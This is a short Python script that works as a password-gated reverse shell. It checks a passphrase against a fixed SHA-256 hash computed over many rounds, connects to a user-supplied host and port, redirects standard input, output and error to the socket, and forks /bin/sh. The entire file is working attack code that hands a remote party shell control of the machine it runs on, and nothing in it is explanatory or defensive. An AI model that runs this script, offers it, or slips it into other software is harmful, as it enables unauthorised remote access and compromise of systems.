#!/usr/bin/env python
import hashlib
import socket
import os

host = raw_input("Target Host: ")
port = raw_input("Target Port: ")
data = raw_input("Authenticate: ")

hash = hashlib.sha256()

for i in range(512):
    hash.update(data)
    data = hash.digest()

assert hash.hexdigest() == 'b55d7aa58f900cac2462b104e8d36ec31e86fc1881b3eed75aeb5660361dfcff'

conn = socket.create_connection((host, int(port)))
fd   = conn.fileno()

os.dup2(fd, 0)
os.dup2(fd, 1)
os.dup2(fd, 2)

if os.fork() == 0:
    os.execvp('/bin/sh', ['/bin/sh'])
